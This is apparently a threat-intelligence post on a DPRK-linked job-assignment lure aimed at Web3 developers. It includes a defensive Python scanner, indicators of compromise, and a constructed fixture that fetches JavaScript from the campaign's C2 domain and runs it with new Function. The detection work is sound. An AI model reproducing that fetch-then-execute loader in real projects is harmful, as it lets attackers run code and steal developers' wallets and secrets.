Beyond eval(): DPRK’s New Malware Strategy Hidden in Job Assignments

2025-10-21 KL4R10N

https://kl4r10n.tech/blog/dprk-new-malware

A DPRK-linked recruiter lure targeted Web3 developers through LinkedIn messages, a Notion assignment, and a public GitLab project that executed a multi-stage Node.js implant when cloned and run locally. The loader fetched attacker-controlled JavaScript from Chainlink-themed typosquat infrastructure, first chainlink-api-v3[.]cloud and later chainlink-api-v3[.]com, then used dynamic execution to start host fingerprinting, VM checks, socket.io C2, and clipboard theft. Follow-on payloads installed runtime dependencies, opened interactive command execution, deployed a keylogger, and recursively searched for wallets, environment files, documents, and other developer secrets for exfiltration to 172[.]86[.]116[.]178. The campaign matters because it embeds malware delivery inside a routine developer workflow and specifically increases the chance of stealing Web3 credentials, wallets, and cloud secrets from targeted candidates.
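A defender-side pre-run check for a cloned "assignment" repository, added here as an example (not code from the report or from KL4R10N): it scans project files for the report's network indicators, for Node.js dynamic-execution sinks that sit in the same file as a network fetch (the loader shape described above), and for npm lifecycle hooks that run before anyone reads the code. The sample loader text is a constructed fixture, and the hook and sink regexes are assumptions about what a reviewer would want flagged.

```python
import re
from pathlib import Path

# Network indicators from this report's IoC table (written defanged in the summary).
IOC_PATTERNS = {
    "c2_domain": re.compile(r"chainlink-api-v3\.(?:com|cloud)", re.I),
    "exfil_ip": re.compile(r"\b172\.86\.116\.178\b"),
}
# Node.js sinks that run a string as code: eval() and its less obvious siblings.
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|vm\.(?:runIn(?:This|New)Context|compileFunction|Script)\s*\(")
# Outbound fetch primitives a loader pairs with a dynamic-exec sink.
NETWORK_FETCH = re.compile(r"\b(?:fetch|axios(?:\.get|\.post)?|https?\.(?:get|request))\s*\(")
# npm lifecycle hooks execute automatically on `npm install`, before any code review.
LIFECYCLE_HOOK = re.compile(r'"(?:preinstall|install|postinstall|prepare)"\s*:')

def scan_source(text: str, name: str = "<string>") -> list[dict]:
    """Return findings for one file. 'high' = known indicator, or fetched data
    can reach a dynamic-exec sink; 'medium' = a sink or install hook alone."""
    findings = []
    for rule, pat in IOC_PATTERNS.items():
        for m in pat.finditer(text):
            findings.append({"file": name, "severity": "high", "rule": rule, "match": m.group(0)})
    sink = DYNAMIC_EXEC.search(text)
    if sink:
        paired = NETWORK_FETCH.search(text) is not None
        findings.append({"file": name, "severity": "high" if paired else "medium",
                         "rule": "fetch_then_dynamic_exec" if paired else "dynamic_exec",
                         "match": sink.group(0)})
    if name.endswith("package.json"):
        for m in LIFECYCLE_HOOK.finditer(text):
            findings.append({"file": name, "severity": "medium", "rule": "lifecycle_hook", "match": m.group(0)})
    return findings

def scan_tree(root: str) -> list[dict]:
    """Scan every script/config file under a cloned project before anything is run."""
    exts = {".js", ".mjs", ".cjs", ".ts", ".json"}
    out = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix in exts:
            out.extend(scan_source(p.read_text(errors="ignore"), str(p)))
    return out

# Constructed fixture mimicking the fetch-then-execute loader shape (not real malware).
SAMPLE_LOADER = """
(async () => {
  const res = await axios.get('https://chainlink-api-v3.cloud/PLACEHOLDER_PATH');
  new Function(res.data)();
})();
"""
```

Run `scan_tree("path/to/clone")` on a freshly cloned assignment and refuse to `npm install` or `node .` while any high finding is unexplained.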

Indicators of Compromise

Type    Value                              First Seen   Last Seen
DOMAIN  chainlink-api-v3.com               2025-10-21   2026-03-23
HASH    b2040f01294c183945fdbe487022cf8e   2025-10-21   2026-02-19
DOMAIN  chainlink-api-v3.cloud             2025-04-11   2026-02-19
IPv4    172.86.116.178                     2025-10-21   2026-02-03
YARA    Node_Beyond_eval_Contagious_Int…   2025-10-21   2025-10-21
URL     http://chainlink-api-v3.com        2025-10-21   2025-10-21
URL     https://chainlink-api-v3.cloud     2025-10-21   2025-10-21
